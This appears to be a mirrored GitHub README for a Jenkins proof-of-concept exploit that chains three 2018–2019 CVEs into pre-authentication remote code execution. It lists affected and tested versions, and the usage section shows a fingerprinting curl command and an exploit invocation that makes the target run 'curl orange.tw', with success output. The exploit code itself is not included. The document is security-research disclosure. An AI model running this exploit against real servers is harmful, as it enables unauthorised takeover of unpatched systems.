I'm a developer

awesome-jenkins-rce-2019

by orangetw

orangetw / awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

479 Stars 105 Forks Last release: Not found 9 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138

  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000


$ python exp.py http://jenkins/ 'curl orange.tw'
[] ANONYMOUS_READ disable!
[] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png

References

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.